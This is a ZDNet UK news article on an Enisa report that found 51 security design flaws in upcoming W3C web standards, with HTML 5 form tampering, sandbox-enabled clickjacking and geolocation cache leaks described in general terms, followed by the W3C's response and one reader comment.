Enisa: W3C web standards pose 51 security threats

Enisa: W3C web standards pose 51 security threats

Summary: Enisa, the EU's information security agency, has found 51 flaws in HTML 5 and other upcoming web standards that could let an attacker steal confidential information

SHARE:
TOPICS: Security
1

Emerging web standards have over 50 security design flaws, many of which could allow an attacker to steal information, the EU's security agency has warned.

Hot topic

HTML 5 hot topic

ZDNet UK's coverage of HTML 5, the development language of the cloud for the next decade

Read more

During year-long research, the European Network Information Security Agency (Enisa) discovered 51 vulnerabilities in 13 upcoming World Wide Web Consortium (W3C) standards and specifications, the agency said in a report on Monday. Among these were issues with the HTML 5 standard, which is being used by Microsoft, Adobe and others in their latest web browsers.

"They're not rootkit-type vulnerabilities, they're more likely to allow an attacker to control a browser context," Giles Hogben, a network security expert at Enisa, told ZDNet UK. "For example, a dodgy page could get information from a legitimate page."

Using the flaws, an attacker could trick people into installing malware to give the hacker remote control of their system, he added. Many could allow a criminal to steal information using form submission and cross-domain requests, according to Enisa.

Possible attacks

In HTML 5, one of the serious design vulnerabilities opens the door to form-tampering through HTML injection. In one scenario, a person buying goods online enters credit card number and other information into a web form. HTML 5 allows buttons, such as a submit button, to exist outside a web form. With the design flaw, an attacker could trick the buyer into sending the financial information to an unintended destination using a malicious button.

They're not rootkit-type vulnerabiltites, they're more likely to allow an attacker to control a browser context.

– Giles Hogben, Enisa

Another possible attack outlined by Enisa turns a browser security feature — a sandbox — into a method of subverting HTML 5 security. Putting websites into a sandbox prevents them from accessing the system via the browser. However, the attack described by Enisa uses the sandbox to disable protection against clickjacking. In clickjacking, a user is fooled into clicking on a seemingly innocuous web object such as a button, which then reveals confidential information.

The HTML 5 specification allows a hacker to put a malicious page inside a sandboxed iframe, disabling top-level navigation, and leaving the user open to clickjacking.

Another flaw highlighted by Enisa, in the Geoloc-Secure-3 cache API specification, lets a hacker retrieve information about the user's location from the cache. In addition, the specification fails to set an upper limit to how long geolocation data is stored in the cache, leaving people open to attacks that give away their movements.

W3C

The W3C has time to change some of the standards, but some may not be reworked to mitigate the flaws completely, according to Hogben. For example, the consortium is unlikely to fully mitigate the HTML 5 form-filling threat through the standard, he said.

ZDNet UK Android app

ZDNet UK app for Android

It's small, it's simple and it's useful. The ZDNet UK app is available for download from the Android Market.

Click to download+

"Some of the flaws we don't expect to be [fully] fixed... especially the one about the forms, as the functionality should be in there for a reason," said Hogben. "We don't expect W3C to take the forms functionality out of the spec."

The standards have been developing for varying amounts of time, and Enisa has submitted its report to W3C in time for W3C working groups to consider before specifying the final standards.

"We have worked with Enisa in preparing this review to ensure that it is relevant and timely to the standards work that is going on. What you are seeing here is the security review process functioning as it should: Independent review identifies possible security issues; the relevant Working Groups then analyse and address the issues raised," the W3C said in a statement.

"The relevant W3C working groups will indeed address these vulnerabilities according to the usual W3C process," it added.


Get the latest technology news and analysis, blogs and reviews delivered directly to your inbox with ZDNet UK's newsletters.

Topic: Security

Tom Espiner

About Tom Espiner

Tom is a technology reporter for ZDNet.com. He covers the security beat, writing about everything from hacking and cybercrime to threats and mitigation. He also focuses on open source and emerging technologies, all the while trying to cut through greenwash.

Kick off your day with ZDNet's daily email newsletter. It's the freshest tech news and opinion, served hot. Get it.

Talkback

1 comment
Log in or register to join the discussion
  • While its good to highlight potential flaws and risks, removing functionality is not always the best approach. As mentioned in the article, often times functionality has good reason for being there.

    Being aware of the risks allows browser developers to put user controllable safeguards into place to detect and thwart possible dodgy pages while allowing users to white list secure pages they trust.

    CSS attacks can be thwarted in a number of ways.

    HTML 4 IFrames, JSON and AJAX are already vulnerable to these kinds of attacks, to some extent; but, proper site design mitigates these risks and has allowed the technology to become safely wide spread.
    edxxx